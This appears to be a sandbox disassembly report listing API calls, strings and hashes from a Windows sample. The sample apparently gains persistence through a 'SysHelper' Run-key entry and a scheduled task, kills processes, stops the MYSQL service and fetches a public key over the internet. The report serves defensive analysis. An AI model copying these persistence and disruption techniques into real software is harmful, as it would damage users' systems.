Associated: 00000001.00000002.1765380462.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1765380462.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$CreateDirectoryFolderFromInitializeInstanceListLocationPathSpecialSystemUninitialize
String ID: \shell32.dll
API String ID: 679253221-3783449302
Opcode ID: 45e46fc2f9e137a48023c8b07f4e0b5fd5f09384ac33b8a62bbc2b8c253a451b
Instruction ID: 1ac700bd2dba931ae0f93f3cd35093afe8c3aec66b03df765643047a9f16b657
Opcode Fuzzy Hash: 45e46fc2f9e137a48023c8b07f4e0b5fd5f09384ac33b8a62bbc2b8c253a451b
Instruction Fuzzy Hash: 1D415E70A40209AFDB10CBA4DC88FEA7B7CEF44705F104499F609D7160D6B4AA45CB54

Function 004549A0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 107libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,?,00000001,?,00454B72), ref: 004549C7
GetProcAddress.KERNEL32(00000000,_OPENSSL_isservice), ref: 004549D7
GetDesktopWindow.USER32 ref: 004549FB
GetProcessWindowStation.USER32(?,00454B72), ref: 00454A01
GetUserObjectInformationW.USER32(00000000,00000002,00000000,00000000,?,?,00454B72), ref: 00454A1C
GetLastError.KERNEL32(?,00454B72), ref: 00454A2A
GetUserObjectInformationW.USER32(00000000,00000002,?,?,?,?,00454B72), ref: 00454A65
_wcsstr.LIBCMT ref: 00454A8A

Strings

_OPENSSL_isservice, xrefs: 004549D1
Service-0x, xrefs: 00454A80

Memory Dump Source

Source File: 00000001.00000002.1765380462.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1765380462.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1765380462.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Yara matches

Similarity

API ID: InformationObjectUserWindow$AddressDesktopErrorHandleLastModuleProcProcessStation_wcsstr
String ID: Service-0x$_OPENSSL_isservice
API String ID: 2112994598-1672312481
Opcode ID: 839ece2f53d05b3d3a3b41915715d02d267126b8b76695ecb3f97597e52a1477
Instruction ID: a4b3c478c226dd270820e71b951499fe23bca8177d071b610c32d3665965eb2a
Opcode Fuzzy Hash: 839ece2f53d05b3d3a3b41915715d02d267126b8b76695ecb3f97597e52a1477
Instruction Fuzzy Hash: 04312831A401049BCB10DBBAEC46AAE7778DFC4325F10426BFC19D72E1EB349D148B58

Function 00454AE0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 75registrywindowCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F4,00454C16,%s(%d): OpenSSL internal error, assertion failed: %s,?,?,?,0045480E,.\crypto\cryptlib.c,00000253,pointer != NULL,?,00451D37,00000000,0040CDAE,00000001,00000001), ref: 00454AFA
GetFileType.KERNEL32(00000000,?,00451D37,00000000,0040CDAE,00000001,00000001), ref: 00454B05
__vfwprintf_p.LIBCMT ref: 00454B27

Part of subcall function 0042BDCC: _vfprintf_helper.LIBCMT ref: 0042BDDF

vswprintf.LIBCMT ref: 00454B5D
RegisterEventSourceA.ADVAPI32(00000000,OPENSSL), ref: 00454B7E
ReportEventA.ADVAPI32(00000000,00000001,00000000,00000000,00000000,00000001,00000000,?,00000000), ref: 00454BA2
DeregisterEventSource.ADVAPI32(00000000), ref: 00454BA9
MessageBoxA.USER32(00000000,?,OpenSSL: FATAL,00000010), ref: 00454BD3

Strings

OpenSSL: FATAL, xrefs: 00454BC7
OPENSSL, xrefs: 00454B77

Memory Dump Source

Source File: 00000001.00000002.1765380462.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1765380462.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1765380462.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Yara matches

Similarity

API ID: Event$Source$DeregisterFileHandleMessageRegisterReportType__vfwprintf_p_vfprintf_helpervswprintf
String ID: OPENSSL$OpenSSL: FATAL
API String ID: 277090408-1348657634
Opcode ID: 48266b123bee2effe3eea144965b75bbd91e26d62acab2e3a1446f4d096604c6
Instruction ID: 2d266f03b07cc91b1361f4b715b0612335af4cc100d4b249efeb6d9ab3704f8b
Opcode Fuzzy Hash: 48266b123bee2effe3eea144965b75bbd91e26d62acab2e3a1446f4d096604c6
Instruction Fuzzy Hash: 74210D716443006BD770A761DC47FEF77D8EF94704F80482EF699861D1EAB89444875B

Function 00412360 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 61registrystringCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?), ref: 00412389
_memset.LIBCMT ref: 004123B6
RegQueryValueExW.ADVAPI32(?,SysHelper,00000000,00000001,?,00000400), ref: 004123DE
RegCloseKey.ADVAPI32(?), ref: 004123E7
GetCommandLineW.KERNEL32 ref: 004123F4
CommandLineToArgvW.SHELL32(00000000,00000000), ref: 004123FF
lstrcpyW.KERNEL32(?,00000000), ref: 0041240E
lstrcmpW.KERNEL32(?,?), ref: 00412422

Strings

Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 0041237F
SysHelper, xrefs: 004123D6

Memory Dump Source

Source File: 00000001.00000002.1765380462.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1765380462.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1765380462.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Yara matches

Similarity

API ID: CommandLine$ArgvCloseOpenQueryValue_memsetlstrcmplstrcpy
String ID: Software\Microsoft\Windows\CurrentVersion\Run$SysHelper
API String ID: 122392481-4165002228
Opcode ID: ffdeb467f25692adb2f41c7a5be08654f874d2c95d3133ace75c87d70b3a0200
Instruction ID: c603cf62551caa9c06587f3e6ced3ee16b2371f56cdaae2afb18e0be874d4686
Opcode Fuzzy Hash: ffdeb467f25692adb2f41c7a5be08654f874d2c95d3133ace75c87d70b3a0200
Instruction Fuzzy Hash: D7112C7194020DABDF50DFA0DC89FEE77BCBB04705F0445A5F509E2151DBB45A889F94

Function 00425B6E Relevance: 16.6, APIs: 11, Instructions: 131COMMONLIBRARYCODE

Download Yara Rule

APIs

__calloc_crt.LIBCMT ref: 00425BF8
__lock.LIBCMT ref: 00425C0E
__copytlocinfo_nolock.LIBCMT ref: 00425C1F
__wsetlocale_nolock.LIBCMT ref: 00425C36
_wcscmp.LIBCMT ref: 00425C59
__lock.LIBCMT ref: 00425C70
__updatetlocinfoEx_nolock.LIBCMT ref: 00425C82
___removelocaleref.LIBCMT ref: 00425C88
__updatetlocinfoEx_nolock.LIBCMT ref: 00425CA7

Memory Dump Source

Source File: 00000001.00000002.1765380462.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1765380462.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1765380462.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Yara matches

Similarity

API ID: Ex_nolock__lock__updatetlocinfo$___removelocaleref__calloc_crt__copytlocinfo_nolock__wsetlocale_nolock_wcscmp
String ID:
API String ID: 1077091919-0
Opcode ID: 7aa5c98289f18997e9299cf2a82b2e33c44f00e8491ec962a9d4b764f8744340
Instruction ID: 0fe30f67420a0b57e0336c9221d2143c2ac41a82f10de3dc78134a272e9def7d
Opcode Fuzzy Hash: 7aa5c98289f18997e9299cf2a82b2e33c44f00e8491ec962a9d4b764f8744340
Instruction Fuzzy Hash: BE412932700724AFDB11AFA6B886B9E7BE0EF44318F90802FF51496282DB7D9544DB1D

Function 00418000 Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 344COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 004180B9
_memmove.LIBCMT ref: 00418124
_memmove.LIBCMT ref: 004181A8
_memmove.LIBCMT ref: 00418221
_memmove.LIBCMT ref: 00418288
_memmove.LIBCMT ref: 004182C6
_memmove.LIBCMT ref: 00418305

Strings

string too long, xrefs: 00418338
invalid string position, xrefs: 00418342

Memory Dump Source

Source File: 00000001.00000002.1765380462.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1765380462.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1765380462.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Yara matches

Similarity

API ID: _memmove
String ID: invalid string position$string too long
API String ID: 4104443479-4289949731
Opcode ID: 72cc4f69e8dc9d7bd856fc9c1b9749c6ccd7664eafd668a19730564a7e917932
Instruction ID: bf4c3c4c16418921af35957e8a842e40232b78bc4dd53ff6fdc572851f10e90f
Opcode Fuzzy Hash: 72cc4f69e8dc9d7bd856fc9c1b9749c6ccd7664eafd668a19730564a7e917932
Instruction Fuzzy Hash: 4AC19F71700209EFDB18CF48C9819EE77A6EF85704B24492EE891CB741DB34ED968B99

Function 0040DAC0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 160comstringCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0040DAEB
CoCreateInstance.OLE32(004D4F6C,00000000,00000001,004D4F3C,?,?,004CA948,000000FF), ref: 0040DB0B
lstrcpyW.KERNEL32(?,?), ref: 0040DBD6
PathRemoveFileSpecW.SHLWAPI(?,?,?,?,?,?,004CA948,000000FF), ref: 0040DBE3
_memset.LIBCMT ref: 0040DC38
CoUninitialize.OLE32 ref: 0040DC92

Strings

Comment, xrefs: 0040DBFF
--Task, xrefs: 0040DBB5
Time Trigger Task, xrefs: 0040DB24, 0040DB34, 0040DB52

Memory Dump Source

Source File: 00000001.00000002.1765380462.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1765380462.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1765380462.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Yara matches

Similarity

API ID: CreateFileInitializeInstancePathRemoveSpecUninitialize_memsetlstrcpy
String ID: --Task$Comment$Time Trigger Task
API String ID: 330603062-1376107329
Opcode ID: 4f76096c1bb55b8fd6772bfaf79823c9e02c83c8f45e810a8838bdd484e9cb7f
Instruction ID: 3ca8ca325a9fd4b6db29fab4a8cd6851ae340f1496bb62272076f21ffc706129
Opcode Fuzzy Hash: 4f76096c1bb55b8fd6772bfaf79823c9e02c83c8f45e810a8838bdd484e9cb7f
Instruction Fuzzy Hash: E051F670A40209AFDB00DF94CC99FAE7BB9FF88705F208469F505AB2A0DB75A945CF54

Function 00411A10 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 63servicesleepCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000001), ref: 00411A1D
OpenServiceW.ADVAPI32(00000000,MYSQL,00000020), ref: 00411A32
ControlService.ADVAPI32(00000000,00000001,?), ref: 00411A46
QueryServiceStatus.ADVAPI32(00000000,?), ref: 00411A5B
Sleep.KERNEL32(?), ref: 00411A75
QueryServiceStatus.ADVAPI32(00000000,?), ref: 00411A80
CloseServiceHandle.ADVAPI32(00000000), ref: 00411A9E
CloseServiceHandle.ADVAPI32(00000000), ref: 00411AA1

Strings

MYSQL, xrefs: 00411A2C

Memory Dump Source

Source File: 00000001.00000002.1765380462.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1765380462.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1765380462.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Yara matches

Similarity

API ID: Service$CloseHandleOpenQueryStatus$ControlManagerSleep
String ID: MYSQL
API String ID: 2359367111-1651825290
Opcode ID: 692faa110e64916c7c56b6385ee5ad1bce035bf71229861a57ca5c091c1d7d7f
Instruction ID: 28721974f2ef8f77e49d09c1c1511d7c7b7ffc9f5d452c27f8aea73f5df61dea
Opcode Fuzzy Hash: 692faa110e64916c7c56b6385ee5ad1bce035bf71229861a57ca5c091c1d7d7f
Instruction Fuzzy Hash: 7F117735A01209ABDB209BD59D88FEF7FACEF45791F040122FB08D2250D728D985CAA8

Function 0044F26C Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 58COMMON

Download Yara Rule

APIs

std::exception::exception.LIBCMT ref: 0044F27F

Part of subcall function 00430CFC: std::exception::_Copy_str.LIBCMT ref: 00430D15

__CxxThrowException@8.LIBCMT ref: 0044F294

Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F

std::exception::exception.LIBCMT ref: 0044F2AD
__CxxThrowException@8.LIBCMT ref: 0044F2C2
std::regex_error::regex_error.LIBCPMT ref: 0044F2D4

Part of subcall function 0044EF74: std::exception::exception.LIBCMT ref: 0044EF8E

__CxxThrowException@8.LIBCMT ref: 0044F2E2
std::exception::exception.LIBCMT ref: 0044F2FB
__CxxThrowException@8.LIBCMT ref: 0044F310

Strings

bad function call, xrefs: 0044F316

Memory Dump Source

Source File: 00000001.00000002.1765380462.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1765380462.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1765380462.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Yara matches

Similarity

API ID: Exception@8Throwstd::exception::exception$Copy_strExceptionRaisestd::exception::_std::regex_error::regex_error
String ID: bad function call
API String ID: 2464034642-3612616537
Opcode ID: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
Instruction ID: b7a33952e270e61bb8336860f47bfa26d0287e47148adb1a9e07c7a629f44a3a
Opcode Fuzzy Hash: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
Instruction Fuzzy Hash: 60110A74D0020DBBCB04FFA5D566CDDBB7CEA04348F408A67BD2497241EB78A7498B99

Function 00465480 Relevance: 15.2, APIs: 7, Strings: 3, Instructions: 172COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,?,00000000,?,?,00000000), ref: 004654C8
GetLastError.KERNEL32(?,?,00000000), ref: 004654D4
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,?,?,00000000), ref: 004654F7
GetLastError.KERNEL32(?,?,00000000), ref: 00465503
MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,?,?,00000000,?,?,00000000), ref: 00465531
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,?,00000008,?,00000000,?,?,00000000), ref: 0046555B
GetLastError.KERNEL32(.\crypto\bio\bss_file.c,000000A9,?,00000000,?,?,00000000), ref: 004655F5

Strings

.\crypto\bio\bss_file.c, xrefs: 004655F0, 0046562F, 00465640
',', xrefs: 0046560B
fopen(', xrefs: 00465611

Memory Dump Source

Source File: 00000001.00000002.1765380462.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1765380462.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1765380462.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID: ','$.\crypto\bio\bss_file.c$fopen('
API String ID: 1717984340-2085858615
Opcode ID: 5bed85aa8c1b563afb7458887addcfa84ee938cd819de717f6d53dc9ad9ea7b7
Instruction ID: 21cfcf061b86b0f752f7d9b12bec731e5652c25b667fcf3b1ac9b742683446ef
Opcode Fuzzy Hash: 5bed85aa8c1b563afb7458887addcfa84ee938cd819de717f6d53dc9ad9ea7b7
Instruction Fuzzy Hash: 5A518E71B40704BBEB206B61DC47FBF7769AF05715F40012BFD05BA2C1E669490186AB

Function 0040C740 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 254COMMON

Download Yara Rule

APIs

Part of subcall function 00420FDD: __wfsopen.LIBCMT ref: 00420FE8

_fgetws.LIBCMT ref: 0040C7BC
_memmove.LIBCMT ref: 0040C89F
CreateDirectoryW.KERNEL32(C:\SystemID,00000000), ref: 0040C94B

Strings

C:\SystemID\PersonalID.txt, xrefs: 0040C77C, 0040C956
C:\SystemID, xrefs: 0040C946

Memory Dump Source

Source File: 00000001.00000002.1765380462.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1765380462.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1765380462.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Yara matches

Similarity

API ID: CreateDirectory__wfsopen_fgetws_memmove
String ID: C:\SystemID$C:\SystemID\PersonalID.txt
API String ID: 2864494435-54166481
Opcode ID: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
Instruction ID: 3a80d152ee3a33a632d987be3a831cd6f981e29f6d1810208bb328cacc5ceb60
Opcode Fuzzy Hash: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
Instruction Fuzzy Hash: 449193B2E00219DBCF20DFA5D9857AFB7B5AF04304F54463BE805B3281E7799A44CB99

Function 00412440 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 52processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(0000000F,00000000), ref: 0041244F
Process32FirstW.KERNEL32(00000000,0000022C), ref: 00412469
OpenProcess.KERNEL32(00000001,00000000,?), ref: 004124A1
TerminateProcess.KERNEL32(00000000,00000009), ref: 004124B0
CloseHandle.KERNEL32(00000000), ref: 004124B7
Process32NextW.KERNEL32(00000000,0000022C), ref: 004124C1
CloseHandle.KERNEL32(00000000), ref: 004124CD

Strings

cmd.exe, xrefs: 00412486

Memory Dump Source

Source File: 00000001.00000002.1765380462.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1765380462.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1765380462.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Yara matches

Similarity

API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
String ID: cmd.exe
API String ID: 2696918072-723907552
Opcode ID: 577ed8ed9705958fd2e422ac99cb6a94193351d2856dfe9262a659f2a85694a3
Instruction ID: b239e8364e8e77cb7af63d5752a1eab109cf3eb7ce5fcb3b526656d556a9da04
Opcode Fuzzy Hash: 577ed8ed9705958fd2e422ac99cb6a94193351d2856dfe9262a659f2a85694a3
Instruction Fuzzy Hash: ED0192355012157BE7206BA1AC89FAF766CEB08714F0400A2FD08D2141EA6489408EB9

Function 0040F310 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 311libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(Shell32.dll), ref: 0040F338
GetProcAddress.KERNEL32(00000000,SHGetFolderPathW), ref: 0040F353

Strings

\, xrefs: 0040F548
Shell32.dll, xrefs: 0040F32C
SHGetFolderPathW, xrefs: 0040F34D

Memory Dump Source

Source File: 00000001.00000002.1765380462.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1765380462.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1765380462.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: SHGetFolderPathW$Shell32.dll$\
API String ID: 2574300362-2555811374
Opcode ID: be864d8308790b92be5507a70b6add5af3086b64f5ec129cc261dae8a5d69eb3
Instruction ID: 879cb2c41796572bb27552663435674e3d239ec9c812fe4031d18dca963833e9
Opcode Fuzzy Hash: be864d8308790b92be5507a70b6add5af3086b64f5ec129cc261dae8a5d69eb3
Instruction Fuzzy Hash: DFC15A70D00209EBDF10DFA4DD85BDEBBB5AF14308F10443AE405B7291EB79AA59CB99

Function 0040CBA0 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 240COMMON

Download Yara Rule

APIs

__except_handler4.MSVCRT ref: 0040CDDE
_malloc.LIBCMT ref: 0040CE12
_malloc.LIBCMT ref: 0040CE21
_fprintf.LIBCMT ref: 0040CE75

Strings

\\n, xrefs: 0040CC1B
Error encrypting message: %s, xrefs: 0040CE67
 , xrefs: 0040CCAF

Memory Dump Source

Source File: 00000001.00000002.1765380462.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1765380462.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1765380462.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Yara matches

Similarity

API ID: _malloc$__except_handler4_fprintf
String ID:  $Error encrypting message: %s$\\n
API String ID: 1783060780-3771355929
Opcode ID: bc6d813e7e752583a03017172366884d0a88b051dc04778f03b6bdc3bc976eb1
Instruction ID: bc568b6946d652cfd5b4c77746d66a5f57144f99ddafb1662d710ebef24806c3
Opcode Fuzzy Hash: bc6d813e7e752583a03017172366884d0a88b051dc04778f03b6bdc3bc976eb1
Instruction Fuzzy Hash: 10A196B1C00249EBEF10EF95DD46BDEBB75AF10308F54052DE40576282D7BA5688CBAA

Function 00463350 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 148COMMONLIBRARYCODE

Download Yara Rule

APIs

_strncmp.LIBCMT ref: 00463382
_strncmp.LIBCMT ref: 004633C2

Strings

Proc-Type: , xrefs: 0046337C
.\crypto\pem\pem_lib.c, xrefs: 00463393, 004633D3, 00463407, 00463439, 00463491
DEK-Info: , xrefs: 00463422
ENCRYPTED, xrefs: 004633BC

Memory Dump Source

Source File: 00000001.00000002.1765380462.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1765380462.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1765380462.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Yara matches

Similarity

API ID: _strncmp
String ID: .\crypto\pem\pem_lib.c$DEK-Info: $ENCRYPTED$Proc-Type:
API String ID: 909875538-2908105608
Opcode ID: ab3012ab59146815ebf28714d7aa14745dda8ec0f3d5ba1861611fdbbd5b6dc0
Instruction ID: 5da15f4c8f0622be9955200bbf206a62195e74188b9aea783317ae4bc8ba6fc6
Opcode Fuzzy Hash: ab3012ab59146815ebf28714d7aa14745dda8ec0f3d5ba1861611fdbbd5b6dc0
Instruction Fuzzy Hash: B7413EA1BC83C129F721592ABC03F9763854B51B17F080467FA88E52C3FB9D8987419F

Function 0040C6A0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 49registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion,00000000,000F003F,?), ref: 0040C6C2
RegQueryValueExW.ADVAPI32(00000000,SysHelper,00000000,00000004,?,?), ref: 0040C6F3
RegCloseKey.ADVAPI32(00000000), ref: 0040C700
RegSetValueExW.ADVAPI32(00000000,SysHelper,00000000,00000004,?,00000004), ref: 0040C725
RegCloseKey.ADVAPI32(00000000), ref: 0040C72E

Strings

SysHelper, xrefs: 0040C6EB, 0040C71D
Software\Microsoft\Windows\CurrentVersion, xrefs: 0040C6B8

Memory Dump Source

Source File: 00000001.00000002.1765380462.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1765380462.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1765380462.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Yara matches

Similarity

API ID: CloseValue$OpenQuery
String ID: Software\Microsoft\Windows\CurrentVersion$SysHelper
API String ID: 3962714758-1667468722
Opcode ID: 1b3e89e7960631348278952d172054be4d8a3531237e516afd507403cd6f8071
Instruction ID: 83d53c3b81c5c3826f22504a9cab54a14a7287ca0244f3776693af22b4817dfa
Opcode Fuzzy Hash: 1b3e89e7960631348278952d172054be4d8a3531237e516afd507403cd6f8071
Instruction Fuzzy Hash: 60112D7594020CFBDB109F91CC86FEEBB78EB04708F2041A5FA04B22A1D7B55B14AB58

Function 0041E6E8 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 44stringnetworkfileCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0041E707

Part of subcall function 0040C500: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0040C51B

InternetOpenW.WININET ref: 0041E743
_wcsstr.LIBCMT ref: 0041E7AE
_memmove.LIBCMT ref: 0041E838
lstrcpyW.KERNEL32(?,?), ref: 0041E90A
lstrcatW.KERNEL32(?,&first=false), ref: 0041E93D
InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0041E954
InternetReadFile.WININET(00000000,?,00000400,?), ref: 0041E96F
SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0041E98C
PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0041E9A3
lstrlenA.KERNEL32(?,00000000,00000000,000000FF), ref: 0041E9CD
InternetCloseHandle.WININET(00000000), ref: 0041E9F3
InternetCloseHandle.WININET(00000000), ref: 0041E9F6
_strstr.LIBCMT ref: 0041EA36
SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0041EA59
PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0041EA74
DeleteFileA.KERNEL32(?), ref: 0041EA82
lstrlenA.KERNEL32({"public_key":",00000000,000000FF), ref: 0041EA92
lstrcpyA.KERNEL32(?,?), ref: 0041EAA4
lstrcpyA.KERNEL32(?,?), ref: 0041EABA
lstrlenA.KERNEL32(?), ref: 0041EAC8
lstrlenA.KERNEL32(00000022), ref: 0041EAE3
lstrcpyW.KERNEL32(?,00000000), ref: 0041EB5B
lstrlenA.KERNEL32(?), ref: 0041EB7C
_malloc.LIBCMT ref: 0041EB86
_memset.LIBCMT ref: 0041EB94
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000001), ref: 0041EBAE
lstrcpyW.KERNEL32(?,00000000), ref: 0041EBB6
_strstr.LIBCMT ref: 0041EBDA
SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0041EC00
PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0041EC24
DeleteFileA.KERNEL32(?), ref: 0041EC32

Strings

{"public_key":", xrefs: 0041EA2E
bowsakkdestx.txt, xrefs: 0041EA67

Memory Dump Source

Source File: 00000001.00000002.1765380462.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1765380462.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1765380462.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Yara matches

Similarity

API ID: Path$Internetlstrcpylstrlen$Folder$AppendFile$CloseDeleteHandleOpen_memset_strstr$ByteCharMultiReadWide_malloc_memmove_wcsstrlstrcat
String ID: bowsakkdestx.txt${"public_key":"
API String ID: 2805819797-1771568745
Opcode ID: b1c6d5b9cc7872d960cbedbbf01e77bd4c23ed7d360ca7e20ceb3fbc707119fd
Instruction ID: c8d03ce4d59ef2fdab541fe9505dce31f646fa9b39186cada3cd653a8fd1c75a
Opcode Fuzzy Hash: b1c6d5b9cc7872d960cbedbbf01e77bd4c23ed7d360ca7e20ceb3fbc707119fd
Instruction Fuzzy Hash: 3901D234448391ABD630DF119C45FDF7B98AF51304F44482EFD8892182EF78A248879B

Function 0042728B Relevance: 12.2, APIs: 8, Instructions: 202COMMON

Download Yara Rule

APIs

